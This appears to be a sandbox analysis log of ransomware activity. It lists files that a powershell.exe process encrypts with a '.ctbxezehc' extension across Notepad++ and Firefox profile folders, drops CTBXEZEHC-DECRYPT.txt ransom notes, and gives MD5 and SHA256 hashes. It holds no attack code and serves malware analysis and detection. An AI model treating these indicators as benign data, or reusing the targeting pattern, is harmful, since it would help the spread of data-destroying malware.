SHA256: 7ce354275dd5433a8c700f64a6144b6544b9ee7293953c5d3f4b96d7a9c741f0
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Mono Industrial.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\khaki.xml.ctbxezehc
binary
MD5: 58ac9efcae224bd8bee94650648b93cc
SHA256: 67793bd872f4a0ed8a0154f9bf9e21b8673362e5e664dbb075d1d0ca5c0e9f31
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\khaki.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\HotFudgeSundae.xml.ctbxezehc
binary
MD5: 0e9b7addd221cc9a26fbe8ad6d1d7288
SHA256: 1ec7aba0b52c1ebbe84037373c92926dd1cf35f3b0d8b23ac5607bdf169b7a26
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\HotFudgeSundae.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Hello Kitty.xml.ctbxezehc
binary
MD5: 6b49d4b68751567993dcd5948c0a32d4
SHA256: 5327fb9410361f1d5470a8aab774b2fe3c39f24b88361de2db2d36e257ee03ee
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Hello Kitty.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Deep Black.xml.ctbxezehc
binary
MD5: 14b2f19b8549a237a9ccc13f81ddc72b
SHA256: ed13863e6560797134a6b4312017a60bf50212e52eecdee7ddff85ec7302395c
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Deep Black.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Choco.xml.ctbxezehc
binary
MD5: 08b63d9c3bfe3b30743fc11f57e4a31b
SHA256: 1f277b2e803721f109ce51cc3f4bc18a6142ffba7e93fdf849187cdad5392d28
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Choco.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Black board.xml.ctbxezehc
binary
MD5: a9655bcd3bf4eaa2c8bb94ecfe2c26ce
SHA256: c6749adaf1078350568c4a630eac741e8ccc365f1214c07391c609ff3a893ded
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Black board.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Bespin.xml.ctbxezehc
binary
MD5: 20525df0e843c5dbb2722f61f936967a
SHA256: 64714ca81304341c4924952b406a64cb657d412d861440a0b755a05aaaecca3f
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Bespin.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\plugins\config\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\plugins\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\functionList.xml.ctbxezehc
binary
MD5: 1ed878750e47caed0f28e2a9cbf1c209
SHA256: 246a2149bdbef4154cf83cf4efb6ea2309cc3f8510217f202551be7bde131c17
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\functionList.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\SystemExtensionsDev\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\contextMenu.xml.ctbxezehc
binary
MD5: 4f1fd714fb3c4d8c9a31dc6c70b1a7d0
SHA256: 64deea5d9e295d9ebda55c94c94abc38a1e3fbcc1e11c943ad979887d8023aa8
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\profiles.ini.ctbxezehc
binary
MD5: c5d379289de1937cbc10601d73df7244
SHA256: 638def73771a07f456b28f9a8faaf8c907dd208720ad4e6212f5597638de0a45
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\contextMenu.xml
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\profiles.ini
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\xulstore.json.ctbxezehc
binary
MD5: 59ffbaf2cf3bd3b62a40a3f26be79e1d
SHA256: 6f70cc4f8701137ca6fb5244327af98ddff161cb4ed4d483aa5857bfb78ebd9a
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\xulstore.json
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\webappsstore.sqlite.ctbxezehc
binary
MD5: e3cfff9ca4c2e30c8c59f3e2704b013e
SHA256: 6042f41312db5a1a68a142bbee11bc9f2176ee8353f54868479c01468b78d062
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\webappsstore.sqlite
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\toFetch\tabs.json.ctbxezehc
binary
MD5: c1608fdd708d39dc30125400fe429fcd
SHA256: 5286150b5da134f97673a60bcd2fccffd8e730d981b6ea3e833670c9b0551bb8
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\toFetch\tabs.json
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\failed\tabs.json.ctbxezehc
binary
MD5: e2d00577dbbbc0da3dd78415ffc17a0c
SHA256: 25d45a564e6ca189f0fae9f2bf46be423e27858718ac63619878d8390a167f3c
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\toFetch\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\failed\tabs.json
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\failed\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\times.json.ctbxezehc
binary
MD5: 521e46c4fa1942e25f480db1a5758925
SHA256: cc203387685a56a17b19441ea39160deb8ccbfe193e37dcc6812b346d19bcd38
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\times.json
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage.sqlite.ctbxezehc
binary
MD5: 8af1258799c54a6789571c073a430008
SHA256: 70b759666908cdf3d604c4e45af7ffaa7bcf59e3e1456758373532f928acba5c
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage.sqlite
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\727688008bsleotcakcliifsittsr%.sqlite.ctbxezehc
binary
MD5: 135dd8a835356f309da2ae7806188f76
SHA256: ab535ba71edbc9e3e8a432aef64dd4d52780d3063e2f8dfbc922c10fd4a8e40c
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\temporary\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\727688008bsleotcakcliifsittsr%.sqlite
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\727688008bsleotcakcliifsittsr%.files\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3899588440psinninpiFn2g%.sqlite.ctbxezehc
binary
MD5: a507f773501c8698de1f838b32e4b29c
SHA256: ebdc6e2d8f284087c2811b80e7a5428e8ef57266b28ee694bc435b925dfad22a
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3899588440psinninpiFn2g%.sqlite
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3899588440psinninpiFn2g%.files\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3561288849sdhlie.sqlite.ctbxezehc
binary
MD5: b03539de814af530434c770272fce68f
SHA256: 53a8a11e43d3186c33fc0a78bb010875104d27c859adbbf0df72d2dea448d0f8
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3561288849sdhlie.sqlite
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3345959086bslnoocdkdlaiFs2t%s.sqlite.ctbxezehc
binary
MD5: 9d9bf05fbe6c7bd5bb8a6e7617fbf055
SHA256: 6512111f5e8795ad1c3a93fde33c9d7a92e3b02a2860d4d8be8926541f251837
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3561288849sdhlie.files\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\IETldCache\index.dat
dat
MD5: d7a950fefd60dbaa01df2d85fefb3862
SHA256: 75d0b1743f61b76a35b1fedd32378837805de58d79fa950cb6e8164bfa72073a
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3345959086bslnoocdkdlaiFs2t%s.files\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite.ctbxezehc
vc
MD5: 2e9a5c00955a889a0412ca765fcd3b73
SHA256: 4d4820f9feacee0f22fc35086d4487f613f9adf2f9935315455f409be4639ec1
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1725441852bxlfogcFk2l%isst.sqlite.ctbxezehc
binary
MD5: b6a503d858ee6040120c18b5405bf2f8
SHA256: 96880c24b5dc1273d08b69f9c66a432f82e819753741b10de9bc5caf07d14b85
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\2918063365piupsah.files\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1725441852bxlfogcFk2l%isst.sqlite
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1725441852bxlfogcFk2l%isst.files\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite.ctbxezehc
binary
MD5: dec72a0df9dcd6197c8585320149f639
SHA256: 7a27ec169e35dff282d87fd8097c94a714e7c1c038479cd46955b6fc15e928f9
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite.ctbxezehc
binary
MD5: a3910e058953cd611dc7be57e57d60fd
SHA256: 7a961af764f9ef3c1eee726be92b6c613b987e34c063472fbc7c28f2aedced4a
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1059394878bslnoicgkullipsFt2s%.sqlite.ctbxezehc
binary
MD5: b58856fc74f83b6a4b9ebfa9d75b4236
SHA256: de39fbe68947d3c6821649df94f90bb24641b54b952acaf3ee9a801e06b67d08
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1059394878bslnoicgkullipsFt2s%.sqlite
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1059394878bslnoicgkullipsFt2s%.files\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\.metadata-v2.ctbxezehc
binary
MD5: 16a60ee0b1d1a860d08f1c4726d01270
SHA256: f83a55b13e2ee39d2c8e3fe8fd0180730393a056956897f0a87b819e2fd4c162
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\.metadata-v2
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\idb\3312185054sbndi_pspte.sqlite.ctbxezehc
binary
MD5: f1c7bcaab1540b9cd564db5b52c02955
SHA256: 4f23755117c019b3531f8227372b9b72464890c09b6608213da09960343ab447
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\.metadata.ctbxezehc
binary
MD5: 12f5ca8f8ee86681b752c4574fd91494
SHA256: 815ad0da59b6769246e2707828c69a9d517136a9bef1b4fb70264a25ac0b5a10
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\.metadata
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\idb\3312185054sbndi_pspte.files\journals\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\idb\3312185054sbndi_pspte.sqlite
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\idb\3312185054sbndi_pspte.files\1
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\idb\3312185054sbndi_pspte.files\1.ctbxezehc
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\idb\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\.metadata-v2.ctbxezehc
binary
MD5: 3010209b23d77d17a7642488877de90c
SHA256: 5b7e9805c140ffb1a21c21ee6e160cd06cd0f7086ce0f7a7245ffacd6d506273
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\idb\3312185054sbndi_pspte.files\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\.metadata-v2
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\idb\3312185054sbndi_pspte.files\journals\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\.metadata.ctbxezehc
binary
MD5: b6ce47e49c0c293fb10de7c283d17ec1
SHA256: 3ccfab9ad955bb89a39f6c17cfe65f18a2e281d27d73762a8c75250bed1f21e5
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\idb\3312185054sbndi_pspte.sqlite.ctbxezehc
binary
MD5: a29ef8e5563cdaaf8697b51a68922361
SHA256: 43b474b74b5b738a0d6d69cd2a1f348adfff27ef9a1471d6953db399684e59e4
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\.metadata
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\idb\3312185054sbndi_pspte.sqlite
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\idb\3312185054sbndi_pspte.files\1
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\idb\3312185054sbndi_pspte.files\1.ctbxezehc
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\idb\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\.metadata-v2.ctbxezehc
binary
MD5: 866f96d6271ed855f244d76bacea6044
SHA256: 36fbe880a8e05c73d392bea67f2111c9963ecdfe2c7b5ac4d39474f1cd588a19
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\idb\3312185054sbndi_pspte.files\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\.metadata.ctbxezehc
binary
MD5: 8ba3985a25a87f70ca99d3911a042760
SHA256: e8834078d931f5bcd71195f7df4edd7f819e9df4ed8213f0caa7192cb175d606
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\.metadata-v2
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\.metadata
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\sessionstore-backups\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\sessionstore-backups\previous.jsonlz4.ctbxezehc
binary
MD5: 4e9f7fa97a0c8b7625fada8402a6e4dd
SHA256: d8122d7ee278c33cc8e0e7fb7c2c19222385a8c7e01fb3b175dc66003bd17582
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\sessionstore.jsonlz4.ctbxezehc
binary
MD5: d48f86adedf3d2ae73e554c45e190a1a
SHA256: 1ed167f5e6d9a489bce64694b56ed3787f11e2c56c4957896692ac68c965435e
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\SiteSecurityServiceState.txt.ctbxezehc
binary
MD5: d610f97f55ac9c92624c547d2f7ff076
SHA256: 0730af041230bb734f86a5acaf6188b251c1540d4dd143f79082a58dc2b0b1bc
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\sessionstore.jsonlz4
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\sessionstore-backups\previous.jsonlz4
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\SiteSecurityServiceState.txt
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\revocations.txt.ctbxezehc
binary
MD5: cd0e8939713cf0f1a140832730ece25a
SHA256: 2268e5c9923faed7c231f95da5a9824ff3c6288a72cea4df8ee7abee0eba8edb
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\saved-telemetry-pings\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\search.json.mozlz4.ctbxezehc
binary
MD5: bcd46d38c9aadfb74df49151f45884d8
SHA256: 58dbbc3c7b6485e93b4be93547bfc4585df23dc6aed12475a0e204e9bf826623
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\sessionCheckpoints.json.ctbxezehc
binary
